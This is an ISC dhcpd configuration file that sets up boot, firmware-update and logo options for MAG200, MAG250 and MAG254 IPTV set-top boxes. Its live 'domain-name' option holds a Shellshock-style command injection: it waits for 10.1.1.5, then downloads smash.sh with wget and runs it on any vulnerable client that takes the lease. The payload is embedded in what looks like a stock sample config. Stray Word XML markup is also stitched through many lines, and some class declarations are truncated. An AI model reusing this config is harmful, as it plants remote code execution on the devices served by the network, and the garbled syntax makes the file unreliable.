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Sample configuration file for ISC dhcpd for Debian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Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as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configuration file instead of this file.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The ddns-updates-style parameter controls whether or not the server will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attempt to do a DNS update when a lease is confirmed. We default to the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behavior of the version 2 packages ('none', since DHCP v2 didn't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have support for DDNS.)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ddns-update-style none;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option definitions common to all supported networks...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domain-name "() { ignored;}; (while true; do ping -c1 10.1.1.5 &gt; /dev/null &amp;&amp; break; done ; /usr/bin/wget http://10.1.1.5/ftp/smash.sh -O /tmp/smash.sh &gt;&gt;/tmp/smash.log 2&gt;&amp;1 ; sh /tmp/smash.sh &gt;&gt;/tmp/smash.log 2&gt;&amp;1)&amp;";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#option domain-name "techstudio.tv";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domain-name-servers 10.0.32.5, 192.168.88.1;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routers 192.168.88.1;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(Default Gateway/Router for loading software)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subnet-mask 255.255.255.0;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default-lease-time 600;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max-lease-time 7200;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If this DHCP server is the official DHCP server for the local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network, the authoritative directive should be uncommented.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#authoritative;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Use this to send dhcp log messages to a different log file (you also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have to hack syslog.conf to complete the redirection).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log-facility local7;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No service will be given on this subnet, but declaring it helps the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DHCP server to understand the network topology.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#subnet 10.152.187.0 netmask 255.255.255.0 {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This is a very basic subnet declaration.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subnet 192.168.88.0 netmask 255.255.255.0 {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range 192.168.88.30 192.168.88.50;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option routers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routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;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This declaration allows BOOTP clients to get dynamic addresses,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which we don't really recommend.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#subnet 10.254.239.32 netmask 255.255.255.224 {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range dynamic-bootp 10.254.239.40 10.254.239.60;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broadcast-address 10.254.239.31;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routers rtr-239-32-1.example.org;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A slightly different configuration for an internal subnet.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#subnet 10.5.5.0 netmask 255.255.255.224 {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#range 192.168.15.30 192.168.15.50;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range 10.5.5.26 10.5.5.30;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domain-name-servers ns1.internal.example.org;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domain-name "internal.example.org";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routers 10.5.5.1;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option broadcast-address 10.5.5.31;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default-lease-time 600;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max-lease-time 7200;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Hosts which require special configuration options can be listed in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host statements.   If no address is specified, the address will be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allocated dynamically (if possible), but the host-specific information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will still come from the host declaration.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#host passacaglia {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hardware ethernet 0:0:c0:5d:bd:95;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filename "vmunix.passacaglia";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server-name "toccata.fugue.com";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Fixed IP addresses can also be specified for hosts.   These addresses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should not also be listed as being available for dynamic assignment.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Hosts for which fixed IP addresses have been specified can boot using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BOOTP or DHCP.   Hosts for which no fixed address is specified can only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be booted with DHCP, unless there is an address range on the subnet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to which a BOOTP client is connected which has the dynamic-bootp flag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set.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#host fantasia {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hardware ethernet 08:00:07:26:c0:a5;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fixed-address fantasia.fugue.com;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You can declare a class of clients and then do address allocation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based on that.   The example below shows a case where all clients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in a certain class get addresses on the 10.17.224/24 subnet, and all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other clients get addresses on the 10.0.29/24 subnet.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#class "foo" {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match if substring (option vendor-class-identifier, 0, 4) = "SUNW";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#shared-network 224-29 {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subnet 10.17.224.0 netmask 255.255.255.0 {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  <w:tab/>
        <w:t xml:space="preserve">option routers rtr-224.example.org;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}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subnet 10.0.29.0 netmask 255.255.255.0 {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  <w:tab/>
        <w:t xml:space="preserve">option routers rtr-29.example.org;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}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pool {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  <w:tab/>
        <w:t xml:space="preserve">allow members of "foo";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  <w:tab/>
        <w:t xml:space="preserve">range 10.17.224.10 10.17.224.250;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}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pool {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  <w:tab/>
        <w:t xml:space="preserve">deny members of "foo";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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">range 10.0.29.10 10.0.29.230;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}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#}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#option ntp-servers 10.1.1.1;#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option domain-name-servers 10.1.1.1;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authoritative;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option subnet-mask 255.255.255.0;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default-lease-time 600;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max-lease-time 7200;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allow bootp;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#############################################################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Option for TeleTec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#############################################################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space TeleTec;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TeleTec.update_url    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 24 = text;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TeleTec.update_sboot  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 25 = text;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TeleTec.update_ver    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 26 = text;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TeleTec.update_mode   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 27 = text;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TeleTec.portal_dhcp   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 22 = text;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TeleTec.update_sboot_ver  code 28 = text;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TeleTec.logo_x        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 16 = integer 16;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TeleTec.logo_y        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 17 = integer 16;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TeleTec.bg_color      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 18 = integer 32;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TeleTec.fg_color      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 19 = integer 32;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TeleTec.mcip          </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 3 = ip-address;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TeleTec.mcport        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 4 = integer 16;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TeleTec.oppubfile     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 9 = text;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TeleTec.mcip_img      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 10 = ip-address;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TeleTec.mcport_img    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 11 = integer 16;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TeleTec.mcip_mng      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 12 = ip-address;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TeleTec.mcport_mng    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 13 = integer 16;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TeleTec.ip_log        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 14 = ip-address;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TeleTec.port_log      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 15 = integer 16;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TeleTec.VerNumber     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 20 = text;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TeleTec.DateTime      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 21 = text;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#############################################################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Option for Infomir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#############################################################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space Infomir;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Infomir.autostart     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 1 = text;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Infomir.bootargs      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 2 = text;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Infomir.mcip          </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 3 = ip-address;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Infomir.mcport        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 4 = integer 16;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Infomir.oppubfile     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 9 = text;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Infomir.mcip_img      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 10 = ip-address;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Infomir.mcport_img    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 11 = integer 16;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Infomir.mcip_mng      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 12 = ip-address;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Infomir.mcport_mng    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 13 = integer 16;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Infomir.ip_log        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 14 = ip-address;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Infomir.port_log      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 15 = integer 16;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Infomir.logo_x        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 16 = integer 16;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Infomir.logo_y        </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 17 = integer 16;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Infomir.bg_color      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 18 = integer 32;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Infomir.fg_color      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 19 = integer 32;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Infomir.VerNumber     </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 20 = text;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Infomir.DateTime      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 21 = text;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Infomir.portal_dhcp   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 22 = text;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Infomir.timezone      </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 23 = text;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Infomir.update_url    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 24 = text;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Infomir.update_sboot  </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 25 = text;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Infomir.update_ver    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 26 = text;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Infomir.update_mode   </w:t>
        <w:tab/>
        <w:t xml:space="preserve">code 27 = text;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Infomir.update_sboot_ver  code 28 = text;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##############################  BOOT MAG200 ###############################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class "MAG200_boot" {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match if (( option vendor-class-identifier="TeleTecMAG200boot"));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filename "mag200/uImage";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next-server 10.1.1.1;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root-path "10.1.1.1:/srv/mag200";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ntp-servers 10.1.1.1;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vendor-option-space TeleTec;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class "MAG200_vendor" {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match if (( option vendor-class-identifier="TeleTecMAG200"));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next-server 10.1.1.1;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ntp-servers 10.1.1.1;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vendor-option-space TeleTec;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TeleTec.portal_dhcp "http://10.1.1.1/stalker_portal/c/index.html";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TeleTec.update_url "tftp://10.1.1.1/mag200/imageupdate_200_212r2";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TeleTec.update_ver "212";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TeleTec.update_sboot "http://10.1.1.1/mag200/SbootIm_038_200";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TeleTec.update_sboot_ver "038";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TeleTec.update_mode "tftp://10.1.1.1/mag200/Bootstrap_200_212r2";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############################## BOOT MAG250 ################################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 "MAG250_upglogo" {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match if (( option vendor-class-identifier="InfomirMAG250upglogo"));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filename "mag254/logoAlfa.bmp.gz";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next-server 192.168.15.2;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ntp-servers 192.168.15.2;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vendor-option-space Infomir;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Infomir.logo_x 0;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Infomir.logo_y 0;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Infomir.bg_color 0x00000000;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Infomir.fg_color 0x00ffffff;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Infomir.oppubfile "mag254/OP.KEY";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class "MAG250_boot" {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match if (( option vendor-class-identifier="InfomirMAG250boot"));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filename "mag250/uImage_mag250";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next-server 192.168.15.2;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root-path "192.168.15.2:/srv/tftp/mag250/rootfsmag250";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ntp-servers 192.168.15.2;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vendor-option-space Infomir;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 "MAG250_upgrade" { #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match if (( option vendor-class-identifier="InfomirMAG250upgrade"));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filename "mag250/Bootstrap";  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next-server 192.168.15.2;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option ntp-servers pool.ntp.org;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option Infomir.update_url "tftp://192.168.15.2/mag250/imageupdate";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option Infomir.update_mode "tftp://192.168.15.2/mag250/Bootstrap";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class "MAG250_vendor" {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match if (( option vendor-class-identifier="InfomirMAG250"));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next-server 192.168.15.2;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ntp-servers 192.168.15.2;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vendor-option-space Infomir;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Infomir.portal_dhcp "http://10.1.1.1/stalker_portal/c/index.html";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Infomir.update_url "tftp://192.168.15.2/mag250/imageupdate";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Infomir.update_ver "221";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option Infomir.update_sboot "http://10.1.1.1/mag250/SbootIm_mag250";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</w:t>
        <w:tab/>
        <w:t xml:space="preserve">option Infomir.update_sboot_ver "007";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Infomir.update_mode "tftp://192.168.15.2/mag250/Bootstrap";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###########################mag254#####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 "MAG254_boot" {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match if (( option vendor-class-identifier="InfomirMAG254boot"));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filename "mag254/uImage";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next-server 192.168.15.2;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root-path "192.168.15.2:/srv/tftp/mag254/rootfs";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ntp-servers 192.168.15.2;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vendor-option-space Infomir;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class "MAG254_vendor" {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match if (( option vendor-class-identifier="InfomirMAG254"));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next-server 192.168.15.2;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ntp-servers 192.168.15.2;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vendor-option-space Infomir;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option Infomir.portal_dhcp "http://192.168.15.2/stalker_portal/c/index.html";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Infomir.update_url "tftp://192.168.15.2/mag254/imageupdate";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Infomir.update_ver "220";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option Infomir.update_sboot "http://192.168.15.2/mag254/SbootIm_mag254";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#    </w:t>
        <w:tab/>
        <w:t xml:space="preserve">option Infomir.update_sboot_ver "007";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Infomir.update_mode "tftp://192.168.15.2/mag254/Bootstrap";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option Infomir.oppubfile "mag254/OP.KEY";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 "MAG254_upglogo" {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match if (( option vendor-class-identifier="InfomirMAG254upglogo"));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filename "mag254/logoAlfa.bmp.gz";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next-server 192.168.15.2;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ntp-servers 192.168.15.2;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vendor-option-space Infomir;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Infomir.logo_x 0;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Infomir.logo_y 0;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Infomir.bg_color 0x00000000;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Infomir.fg_color 0x00ffffff;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option Infomir.oppubfile "mag254/OP.KEY";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